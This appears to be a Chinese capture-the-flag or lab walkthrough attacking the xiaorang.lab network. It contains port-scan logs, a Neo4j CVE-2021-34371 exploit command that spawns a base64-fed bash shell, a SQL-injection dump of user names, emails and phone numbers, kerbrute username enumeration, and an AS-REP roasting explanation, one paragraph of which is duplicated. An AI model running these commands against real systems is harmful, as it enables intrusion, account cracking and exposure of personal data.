外网信息收集
此时发现没有出现web资产,扫描全端口:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 D:\桌面\信息收集\fscan2>fscan.exe -h 39.99.136.105 -p 1-65535 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 2.0.0 [*] 扫描类型: all, 目标端口: 1-65535 [*] 开始信息扫描... [*] 最终有效主机数量: 1 [*] 共解析 65535 个有效端口 [+] 端口开放 39.99.136.105:22 [+] 端口开放 39.99.136.105:1337 [+] 端口开放 39.99.136.105:43813 [+] 存活端口数量: 3 [*] 开始漏洞扫描... [*] 已完成 0/3 [-] webtitle https://39.99.136.105:1337 Get "https://39.99.136.105:1337": EOF [!] 扫描错误 39.99.136.105:1337 - Get "https://39.99.136.105:1337": EOF [!] 扫描错误 39.99.136.105:43813 - Get "https://39.99.136.105:43813": EOF [!] 扫描错误 39.99.136.105:22 - 扫描总时间超时: context deadline exceeded [+] 扫描已完成: 3/3 [*] 扫描结束,耗时: 4m53.3039141s
Neo4j数据库
CVE-2021-34371
1 java -jar rhino_gadget.jar rmi://39.99.136.105:1337 "bash -c {echo,xxx}|{base64,-d}|{bash,-i}"
内网渗透
内网信息收集
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 neo4j@ubuntu:/tmp$ ./fscan -h 172.22.6.1/24 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │ └──────────────────────────────────────────────┘ Fscan Version: 2.0.0 [2025-03-08 14:05:28] [INFO] 暴力破解线程数: 1 [2025-03-08 14:05:28] [INFO] 开始信息扫描 [2025-03-08 14:05:28] [INFO] CIDR范围: 172.22.6.0-172.22.6.255 [2025-03-08 14:05:28] [INFO] 生成IP范围: 172.22.6.0.%!d(string=172.22.6.255) - %!s(MISSING).%!d(MISSING) [2025-03-08 14:05:29] [INFO] 解析CIDR 172.22.6.1/24 -> IP范围 172.22.6.0-172.22.6.255 [2025-03-08 14:05:29] [INFO] 最终有效主机数量: 256 [2025-03-08 14:05:29] [INFO] 开始主机扫描 [2025-03-08 14:05:29] [INFO] 正在尝试无监听ICMP探测... [2025-03-08 14:05:29] [INFO] 当前用户权限不足,无法发送ICMP包 [2025-03-08 14:05:29] [INFO] 切换为PING方式探测... [2025-03-08 14:05:29] [SUCCESS] 目标 172.22.6.12 存活 (ICMP) [2025-03-08 14:05:29] [SUCCESS] 目标 172.22.6.25 存活 (ICMP) [2025-03-08 14:05:29] [SUCCESS] 目标 172.22.6.38 存活 (ICMP) [2025-03-08 14:05:29] [SUCCESS] 目标 172.22.6.36 存活 (ICMP) [2025-03-08 14:05:35] [INFO] 存活主机数量: 4 [2025-03-08 14:05:35] [INFO] 有效端口数量: 233 [2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.12:88 [2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.36:22 [2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.12:135 [2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.25:139 [2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.12:139 [2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.25:135 [2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.12:389 [2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.38:22 [2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.25:445 [2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.12:445 [2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.38:80 [2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.36:7687 [2025-03-08 14:05:35] [SUCCESS] 服务识别 172.22.6.36:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.] [2025-03-08 14:05:35] [SUCCESS] 服务识别 172.22.6.38:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.] [2025-03-08 14:05:40] [SUCCESS] 服务识别 172.22.6.12:88 => [2025-03-08 14:05:40] [SUCCESS] 服务识别 172.22.6.25:139 => Banner:[.] [2025-03-08 14:05:40] [SUCCESS] 服务识别 172.22.6.12:139 => Banner:[.] [2025-03-08 14:05:40] [SUCCESS] 服务识别 172.22.6.12:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name [2025-03-08 14:05:40] [SUCCESS] 服务识别 172.22.6.25:445 => [2025-03-08 14:05:40] [SUCCESS] 服务识别 172.22.6.12:445 => [2025-03-08 14:05:41] [SUCCESS] 服务识别 172.22.6.38:80 => [http] [2025-03-08 14:05:46] [SUCCESS] 服务识别 172.22.6.36:7687 => [2025-03-08 14:06:40] [SUCCESS] 服务识别 172.22.6.12:135 => [2025-03-08 14:06:40] [SUCCESS] 服务识别 172.22.6.25:135 => [2025-03-08 14:06:40] [INFO] 存活端口数量: 12 [2025-03-08 14:06:40] [INFO] 开始漏洞扫描 [2025-03-08 14:06:40] [INFO] 加载的插件: findnet, ldap, ms17010, neo4j, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle [2025-03-08 14:06:40] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.6.25 主机名: WIN2019 发现的网络接口: IPv4地址: └─ 172.22.6.25 [2025-03-08 14:06:40] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.6.12 主机名: DC-PROGAME 发现的网络接口: IPv4地址: └─ 172.22.6.12 [2025-03-08 14:06:40] [SUCCESS] 网站标题 http://172.22.6.38 状态码:200 长度:1531 标题:后台登录 [2025-03-08 14:06:40] [SUCCESS] NetBios 172.22.6.25 XIAORANG\WIN2019 [2025-03-08 14:06:40] [SUCCESS] NetBios 172.22.6.12 DC:DC-PROGAME.xiaorang.lab Windows Server 2016 Datacenter 14393 [2025-03-08 14:06:40] [INFO] 系统信息 172.22.6.12 [Windows Server 2016 Datacenter 14393] [2025-03-08 14:06:41] [SUCCESS] 网站标题 https://172.22.6.36:7687 状态码:400 长度:50 标题:无标题 [2025-03-08 14:07:04] [SUCCESS] 扫描已完成: 22/22
后台登录
后台登录存在Sql注入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 Database: oa_db Table: oa_users [500 entries] +-----+----------------------------+-------------+-----------------+ | id | email | phone | username | +-----+----------------------------+-------------+-----------------+ [14:17:26] [WARNING] console output will be trimmed to last 256 rows due to large table size | 245 | chenyan@xiaorang.lab | 18281528743 | CHEN YAN | | 246 | tanggui@xiaorang.lab | 18060615547 | TANG GUI | | 247 | buning@xiaorang.lab | 13046481392 | BU NING | | 248 | beishu@xiaorang.lab | 18268508400 | BEI SHU | | 249 | shushi@xiaorang.lab | 17770383196 | SHU SHI | | 250 | fuyi@xiaorang.lab | 18902082658 | FU YI | | 251 | pangcheng@xiaorang.lab | 18823789530 | PANG CHENG | | 252 | tonghao@xiaorang.lab | 13370873526 | TONG HAO | | 253 | jiaoshan@xiaorang.lab | 15375905173 | JIAO SHAN | | 254 | dulun@xiaorang.lab | 13352331157 | DU LUN | | 255 | kejuan@xiaorang.lab | 13222550481 | KE JUAN | | 256 | gexin@xiaorang.lab | 18181553086 | GE XIN | | 257 | lugu@xiaorang.lab | 18793883130 | LU GU | | 258 | guzaicheng@xiaorang.lab | 15309377043 | GU ZAI CHENG | | 259 | feicai@xiaorang.lab | 13077435367 | FEI CAI | | 260 | ranqun@xiaorang.lab | 18239164662 | RAN QUN | | 261 | zhouyi@xiaorang.lab | 13169264671 | ZHOU YI | | 262 | shishu@xiaorang.lab | 18592890189 | SHI SHU | | 263 | yanyun@xiaorang.lab | 15071085768 | YAN YUN | | 264 | chengqiu@xiaorang.lab | 13370162980 | CHENG QIU | | 265 | louyou@xiaorang.lab | 13593582379 | LOU YOU | | 266 | maqun@xiaorang.lab | 15235945624 | MA QUN | | 267 | wenbiao@xiaorang.lab | 13620643639 | WEN BIAO | | 268 | weishengshan@xiaorang.lab | 18670502260 | WEI SHENG SHAN | | 269 | zhangxin@xiaorang.lab | 15763185760 | ZHANG XIN | | 270 | chuyuan@xiaorang.lab | 18420545268 | CHU YUAN | | 271 | wenliang@xiaorang.lab | 13601678032 | WEN LIANG | | 272 | yulvxue@xiaorang.lab | 18304374901 | YU LV XUE | | 273 | luyue@xiaorang.lab | 18299785575 | LU YUE | | 274 | ganjian@xiaorang.lab | 18906111021 | GAN JIAN | | 275 | pangzhen@xiaorang.lab | 13479328562 | PANG ZHEN | | 276 | guohong@xiaorang.lab | 18510220597 | GUO HONG | | 277 | lezhong@xiaorang.lab | 15320909285 | LE ZHONG | | 278 | sheweiyue@xiaorang.lab | 13736399596 | SHE WEI YUE | | 279 | dujian@xiaorang.lab | 15058892639 | DU JIAN | | 280 | lidongjin@xiaorang.lab | 18447207007 | LI DONG JIN | | 281 | hongqun@xiaorang.lab | 15858462251 | HONG QUN | | 282 | yexing@xiaorang.lab | 13719043564 | YE XING | | 283 | maoda@xiaorang.lab | 13878840690 | MAO DA | | 284 | qiaomei@xiaorang.lab | 13053207462 | QIAO MEI | | 285 | nongzhen@xiaorang.lab | 15227699960 | NONG ZHEN | | 286 | dongshu@xiaorang.lab | 15695562947 | DONG SHU | | 287 | zhuzhu@xiaorang.lab | 13070163385 | ZHU ZHU | | 288 | jiyun@xiaorang.lab | 13987332999 | JI YUN | | 289 | qiguanrou@xiaorang.lab | 15605983582 | QI GUAN ROU | | 290 | yixue@xiaorang.lab | 18451603140 | YI XUE | | 291 | chujun@xiaorang.lab | 15854942459 | CHU JUN | | 292 | shenshan@xiaorang.lab | 17712052191 | SHEN SHAN | | 293 | lefen@xiaorang.lab | 13271196544 | LE FEN | | 294 | yubo@xiaorang.lab | 13462202742 | YU BO | | 295 | helianrui@xiaorang.lab | 15383000907 | HE LIAN RUI | | 296 | xuanqun@xiaorang.lab | 18843916267 | XUAN QUN | | 297 | shangjun@xiaorang.lab | 15162486698 | SHANG JUN | | 298 | huguang@xiaorang.lab | 18100586324 | HU GUANG | | 299 | wansifu@xiaorang.lab | 18494761349 | WAN SI FU | | 300 | fenghong@xiaorang.lab | 13536727314 | FENG HONG | | 301 | wanyan@xiaorang.lab | 17890844429 | WAN YAN | | 302 | diyan@xiaorang.lab | 18534028047 | DI YAN | | 303 | xiangyu@xiaorang.lab | 13834043047 | XIANG YU | | 304 | songyan@xiaorang.lab | 15282433280 | SONG YAN | | 305 | fandi@xiaorang.lab | 15846960039 | FAN DI | | 306 | xiangjuan@xiaorang.lab | 18120327434 | XIANG JUAN | | 307 | beirui@xiaorang.lab | 18908661803 | BEI RUI | | 308 | didi@xiaorang.lab | 13413041463 | DI DI | | 309 | zhubin@xiaorang.lab | 15909558554 | ZHU BIN | | 310 | lingchun@xiaorang.lab | 13022790678 | LING CHUN | | 311 | zhenglu@xiaorang.lab | 13248244873 | ZHENG LU | | 312 | xundi@xiaorang.lab | 18358493414 | XUN DI | | 313 | wansishun@xiaorang.lab | 18985028319 | WAN SI SHUN | | 314 | yezongyue@xiaorang.lab | 13866302416 | YE ZONG YUE | | 315 | bianmei@xiaorang.lab | 18540879992 | BIAN MEI | | 316 | shanshao@xiaorang.lab | 18791488918 | SHAN SHAO | | 317 | zhenhui@xiaorang.lab | 13736784817 | ZHEN HUI | | 318 | chengli@xiaorang.lab | 15913267394 | CHENG LI | | 319 | yufen@xiaorang.lab | 18432795588 | YU FEN | | 320 | jiyi@xiaorang.lab | 13574211454 | JI YI | | 321 | panbao@xiaorang.lab | 13675851303 | PAN BAO | | 322 | mennane@xiaorang.lab | 15629706208 | MEN NAN E | | 323 | fengsi@xiaorang.lab | 13333432577 | FENG SI | | 324 | mingyan@xiaorang.lab | 18296909463 | MING YAN | | 325 | luoyou@xiaorang.lab | 15759321415 | LUO YOU | | 326 | liangduanqing@xiaorang.lab | 13150744785 | LIANG DUAN QING | | 327 | nongyan@xiaorang.lab | 18097386975 | NONG YAN | | 328 | haolun@xiaorang.lab | 15152700465 | HAO LUN | | 329 | oulun@xiaorang.lab | 13402760696 | OU LUN | | 330 | weichipeng@xiaorang.lab | 18057058937 | WEI CHI PENG | | 331 | qidiaofang@xiaorang.lab | 18728297829 | QI DIAO FANG | | 332 | xuehe@xiaorang.lab | 13398862169 | XUE HE | | 333 | chensi@xiaorang.lab | 18030178713 | CHEN SI | | 334 | guihui@xiaorang.lab | 17882514129 | GUI HUI | | 335 | fuyue@xiaorang.lab | 18298436549 | FU YUE | | 336 | wangxing@xiaorang.lab | 17763645267 | WANG XING | | 337 | zhengxiao@xiaorang.lab | 18673968392 | ZHENG XIAO | | 338 | guhui@xiaorang.lab | 15166711352 | GU HUI | | 339 | baoai@xiaorang.lab | 15837430827 | BAO AI | | 340 | hangzhao@xiaorang.lab | 13235488232 | HANG ZHAO | | 341 | xingye@xiaorang.lab | 13367587521 | XING YE | | 342 | qianyi@xiaorang.lab | 18657807767 | QIAN YI | | 343 | xionghong@xiaorang.lab | 17725874584 | XIONG HONG | | 344 | zouqi@xiaorang.lab | 15300430128 | ZOU QI | | 345 | rongbiao@xiaorang.lab | 13034242682 | RONG BIAO | | 346 | gongxin@xiaorang.lab | 15595839880 | GONG XIN | | 347 | luxing@xiaorang.lab | 18318675030 | LU XING | | 348 | huayan@xiaorang.lab | 13011805354 | HUA YAN | | 349 | duyue@xiaorang.lab | 15515878208 | DU YUE | | 350 | xijun@xiaorang.lab | 17871583183 | XI JUN | | 351 | daiqing@xiaorang.lab | 18033226216 | DAI QING | | 352 | yingbiao@xiaorang.lab | 18633421863 | YING BIAO | | 353 | hengteng@xiaorang.lab | 15956780740 | HENG TENG | | 354 | changwu@xiaorang.lab | 15251485251 | CHANG WU | | 355 | chengying@xiaorang.lab | 18788248715 | CHENG YING | | 356 | luhong@xiaorang.lab | 17766091079 | LU HONG | | 357 | tongxue@xiaorang.lab | 18466102780 | TONG XUE | | 358 | xiangqian@xiaorang.lab | 13279611385 | XIANG QIAN | | 359 | shaokang@xiaorang.lab | 18042645434 | SHAO KANG | | 360 | nongzhu@xiaorang.lab | 13934236634 | NONG ZHU | | 361 | haomei@xiaorang.lab | 13406913218 | HAO MEI | | 362 | maoqing@xiaorang.lab | 15713298425 | MAO QING | | 363 | xiai@xiaorang.lab | 18148404789 | XI AI | | 364 | bihe@xiaorang.lab | 13628593791 | BI HE | | 365 | gaoli@xiaorang.lab | 15814408188 | GAO LI | | 366 | jianggong@xiaorang.lab | 15951118926 | JIANG GONG | | 367 | pangning@xiaorang.lab | 13443921700 | PANG NING | | 368 | ruishi@xiaorang.lab | 15803112819 | RUI SHI | | 369 | wuhuan@xiaorang.lab | 13646953078 | WU HUAN | | 370 | qiaode@xiaorang.lab | 13543564200 | QIAO DE | | 371 | mayong@xiaorang.lab | 15622971484 | MA YONG | | 372 | hangda@xiaorang.lab | 15937701659 | HANG DA | | 373 | changlu@xiaorang.lab | 13734991654 | CHANG LU | | 374 | liuyuan@xiaorang.lab | 15862054540 | LIU YUAN | | 375 | chenggu@xiaorang.lab | 15706685526 | CHENG GU | | 376 | shentuyun@xiaorang.lab | 15816902379 | SHEN TU YUN | | 377 | zhuangsong@xiaorang.lab | 17810274262 | ZHUANG SONG | | 378 | chushao@xiaorang.lab | 18822001640 | CHU SHAO | | 379 | heli@xiaorang.lab | 13701347081 | HE LI | | 380 | haoming@xiaorang.lab | 15049615282 | HAO MING | | 381 | xieyi@xiaorang.lab | 17840660107 | XIE YI | | 382 | shangjie@xiaorang.lab | 15025010410 | SHANG JIE | | 383 | situxin@xiaorang.lab | 18999728941 | SI TU XIN | | 384 | linxi@xiaorang.lab | 18052976097 | LIN XI | | 385 | zoufu@xiaorang.lab | 15264535633 | ZOU FU | | 386 | qianqing@xiaorang.lab | 18668594658 | QIAN QING | | 387 | qiai@xiaorang.lab | 18154690198 | QI AI | | 388 | ruilin@xiaorang.lab | 13654483014 | RUI LIN | | 389 | luomeng@xiaorang.lab | 15867095032 | LUO MENG | | 390 | huaren@xiaorang.lab | 13307653720 | HUA REN | | 391 | yanyangmei@xiaorang.lab | 15514015453 | YAN YANG MEI | | 392 | zuofen@xiaorang.lab | 15937087078 | ZUO FEN | | 393 | manyuan@xiaorang.lab | 18316106061 | MAN YUAN | | 394 | yuhui@xiaorang.lab | 18058257228 | YU HUI | | 395 | sunli@xiaorang.lab | 18233801124 | SUN LI | | 396 | guansixin@xiaorang.lab | 13607387740 | GUAN SI XIN | | 397 | ruisong@xiaorang.lab | 13306021674 | RUI SONG | | 398 | qiruo@xiaorang.lab | 13257810331 | QI RUO | | 399 | jinyu@xiaorang.lab | 18565922652 | JIN YU | | 400 | shoujuan@xiaorang.lab | 18512174415 | SHOU JUAN | | 401 | yanqian@xiaorang.lab | 13799789435 | YAN QIAN | | 402 | changyun@xiaorang.lab | 18925015029 | CHANG YUN | | 403 | hualu@xiaorang.lab | 13641470801 | HUA LU | | 404 | huanming@xiaorang.lab | 15903282860 | HUAN MING | | 405 | baoshao@xiaorang.lab | 13795275611 | BAO SHAO | | 406 | hongmei@xiaorang.lab | 13243605925 | HONG MEI | | 407 | manyun@xiaorang.lab | 13238107359 | MAN YUN | | 408 | changwan@xiaorang.lab | 13642205622 | CHANG WAN | | 409 | wangyan@xiaorang.lab | 13242486231 | WANG YAN | | 410 | shijian@xiaorang.lab | 15515077573 | SHI JIAN | | 411 | ruibei@xiaorang.lab | 18157706586 | RUI BEI | | 412 | jingshao@xiaorang.lab | 18858376544 | JING SHAO | | 413 | jinzhi@xiaorang.lab | 18902437082 | JIN ZHI | | 414 | yuhui@xiaorang.lab | 15215599294 | YU HUI | | 415 | zangpeng@xiaorang.lab | 18567574150 | ZANG PENG | | 416 | changyun@xiaorang.lab | 15804640736 | CHANG YUN | | 417 | yetai@xiaorang.lab | 13400150018 | YE TAI | | 418 | luoxue@xiaorang.lab | 18962643265 | LUO XUE | | 419 | moqian@xiaorang.lab | 18042706956 | MO QIAN | | 420 | xupeng@xiaorang.lab | 15881934759 | XU PENG | | 421 | ruanyong@xiaorang.lab | 15049703903 | RUAN YONG | | 422 | guliangxian@xiaorang.lab | 18674282714 | GU LIANG XIAN | | 423 | yinbin@xiaorang.lab | 15734030492 | YIN BIN | | 424 | huarui@xiaorang.lab | 17699257041 | HUA RUI | | 425 | niuya@xiaorang.lab | 13915041589 | NIU YA | | 426 | guwei@xiaorang.lab | 13584571917 | GU WEI | | 427 | qinguan@xiaorang.lab | 18427953434 | QIN GUAN | | 428 | yangdanhan@xiaorang.lab | 15215900100 | YANG DAN HAN | | 429 | yingjun@xiaorang.lab | 13383367818 | YING JUN | | 430 | weiwan@xiaorang.lab | 13132069353 | WEI WAN | | 431 | sunduangu@xiaorang.lab | 15737981701 | SUN DUAN GU | | 432 | sisiwu@xiaorang.lab | 18021600640 | SI SI WU | | 433 | nongyan@xiaorang.lab | 13312613990 | NONG YAN | | 434 | xuanlu@xiaorang.lab | 13005748230 | XUAN LU | | 435 | yunzhong@xiaorang.lab | 15326746780 | YUN ZHONG | | 436 | gengfei@xiaorang.lab | 13905027813 | GENG FEI | | 437 | zizhuansong@xiaorang.lab | 13159301262 | ZI ZHUAN SONG | | 438 | ganbailong@xiaorang.lab | 18353612904 | GAN BAI LONG | | 439 | shenjiao@xiaorang.lab | 15164719751 | SHEN JIAO | | 440 | zangyao@xiaorang.lab | 18707028470 | ZANG YAO | | 441 | yangdanhe@xiaorang.lab | 18684281105 | YANG DAN HE | | 442 | chengliang@xiaorang.lab | 13314617161 | CHENG LIANG | | 443 | xudi@xiaorang.lab | 18498838233 | XU DI | | 444 | wulun@xiaorang.lab | 18350490780 | WU LUN | | 445 | yuling@xiaorang.lab | 18835870616 | YU LING | | 446 | taoya@xiaorang.lab | 18494928860 | TAO YA | | 447 | jinle@xiaorang.lab | 15329208123 | JIN LE | | 448 | youchao@xiaorang.lab | 13332964189 | YOU CHAO | | 449 | liangduanzhi@xiaorang.lab | 15675237494 | LIANG DUAN ZHI | | 450 | jiagupiao@xiaorang.lab | 17884962455 | JIA GU PIAO | | 451 | ganze@xiaorang.lab | 17753508925 | GAN ZE | | 452 | jiangqing@xiaorang.lab | 15802357200 | JIANG QING | | 453 | jinshan@xiaorang.lab | 13831466303 | JIN SHAN | | 454 | zhengpubei@xiaorang.lab | 13690156563 | ZHENG PU BEI | | 455 | cuicheng@xiaorang.lab | 17641589842 | CUI CHENG | | 456 | qiyong@xiaorang.lab | 13485427829 | QI YONG | | 457 | qizhu@xiaorang.lab | 18838859844 | QI ZHU | | 458 | ganjian@xiaorang.lab | 18092585003 | GAN JIAN | | 459 | yurui@xiaorang.lab | 15764121637 | YU RUI | | 460 | feishu@xiaorang.lab | 18471512248 | FEI SHU | | 461 | chenxin@xiaorang.lab | 13906545512 | CHEN XIN | | 462 | shengzhe@xiaorang.lab | 18936457394 | SHENG ZHE | | 463 | wohong@xiaorang.lab | 18404022650 | WO HONG | | 464 | manzhi@xiaorang.lab | 15973350408 | MAN ZHI | | 465 | xiangdong@xiaorang.lab | 13233908989 | XIANG DONG | | 466 | weihui@xiaorang.lab | 15035834945 | WEI HUI | | 467 | xingquan@xiaorang.lab | 18304752969 | XING QUAN | | 468 | miaoshu@xiaorang.lab | 15121570939 | MIAO SHU | | 469 | gongwan@xiaorang.lab | 18233990398 | GONG WAN | | 470 | qijie@xiaorang.lab | 15631483536 | QI JIE | | 471 | shaoting@xiaorang.lab | 15971628914 | SHAO TING | | 472 | xiqi@xiaorang.lab | 18938747522 | XI QI | | 473 | jinghong@xiaorang.lab | 18168293686 | JING HONG | | 474 | qianyou@xiaorang.lab | 18841322688 | QIAN YOU | | 475 | chuhua@xiaorang.lab | 15819380754 | CHU HUA | | 476 | yanyue@xiaorang.lab | 18702474361 | YAN YUE | | 477 | huangjia@xiaorang.lab | 13006878166 | HUANG JIA | | 478 | zhouchun@xiaorang.lab | 13545820679 | ZHOU CHUN | | 479 | jiyu@xiaorang.lab | 18650881187 | JI YU | | 480 | wendong@xiaorang.lab | 17815264093 | WEN DONG | | 481 | heyuan@xiaorang.lab | 18710821773 | HE YUAN | | 482 | mazhen@xiaorang.lab | 18698248638 | MA ZHEN | | 483 | shouchun@xiaorang.lab | 15241369178 | SHOU CHUN | | 484 | liuzhe@xiaorang.lab | 18530936084 | LIU ZHE | | 485 | fengbo@xiaorang.lab | 15812110254 | FENG BO | | 486 | taigongyuan@xiaorang.lab | 15943349034 | TAI GONG YUAN | | 487 | gesheng@xiaorang.lab | 18278508909 | GE SHENG | | 488 | songming@xiaorang.lab | 13220512663 | SONG MING | | 489 | yuwan@xiaorang.lab | 15505678035 | YU WAN | | 490 | diaowei@xiaorang.lab | 13052582975 | DIAO WEI | | 491 | youyi@xiaorang.lab | 18036808394 | YOU YI | | 492 | rongxianyu@xiaorang.lab | 18839918955 | RONG XIAN YU | | 493 | fuyi@xiaorang.lab | 15632151678 | FU YI | | 494 | linli@xiaorang.lab | 17883399275 | LIN LI | | 495 | weixue@xiaorang.lab | 18672465853 | WEI XUE | | 496 | hejuan@xiaorang.lab | 13256081102 | HE JUAN | | 497 | zuoqiutai@xiaorang.lab | 18093001354 | ZUO QIU TAI | | 498 | siyi@xiaorang.lab | 17873307773 | SI YI | | 499 | shenshan@xiaorang.lab | 18397560369 | SHEN SHAN | | 500 | tongdong@xiaorang.lab | 15177549595 | TONG DONG | +-----+----------------------------+-------------+-----------------+
Kerberos AS-REQ 域内用户名枚举攻击
看到 @xiaorang.lab
的结尾很容易想到可能要去枚举域内用户。
在kerberos的AS-REQ认证阶段,当cname值中的用户不存在时,返回包会提示KDC_ERR_C_PRINCIPAL_UNKNOWN。当用户名存在,密码正确和密码错误时,返回包会有所不同。所以当我们没有域凭证时,我们可以基于该差异对域用户进行用户枚举。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 neo4j@ubuntu:/tmp$ ./kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab 1.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 03/08/25 - Ronnie Flathers @ropnop 2025/03/08 14:33:27 > Using KDC(s): 2025/03/08 14:33:27 > 172.22.6.12:88 2025/03/08 14:33:27 > [+] VALID USERNAME: chengqiu@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: louyou@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: weishengshan@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: maqun@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: wenbiao@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: wenliang@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: chuyuan@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: pangzhen@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: yulvxue@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: luyue@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: lezhong@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: guohong@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: ganjian@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: sheweiyue@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: dujian@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: yexing@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: hongqun@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: lidongjin@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: qiaomei@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: maoda@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: zhangxin@xiaorang.lab 2025/03/08 14:33:27 > [+] VALID USERNAME: wenshao@xiaorang.lab 2025/03/08 14:33:27 > Done! Tested 124 usernames (22 valid) in 0.014 seconds
AS-REP Roasting攻击
AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。但是该攻击方式利用比较局限。需要用户开启设置 “Do not require Kerberos preauthentication(不需要kerberos预身份验证) “ 。
对于域用户,如果设置了选项Do not require Kerberos preauthentication(不要求Kerberos预身份认证),此时向域控制器的88端口发送AS-REQ请求,对收到的AS-REP内容重新组合,能够拼接成”Kerberos 5 AS-REP etype 23”(18200)的格式,接下来可以使用hashcat或是john对其破解,最终获得该用户的明文口令。
对于域用户,如果设置了选项Do not require Kerberos preauthentication
(不要求Kerberos预身份认证),此时向域控制器的88端口发送AS-REQ请求,对收到的AS-REP内容重新组合,能够拼接成”Kerberos 5 AS-REP etype 23”(18200)的格式,接下来可以使用hashcat
或是john
对其破解,最终获得该用户的明文口令。默认情况下该配置不会设置。
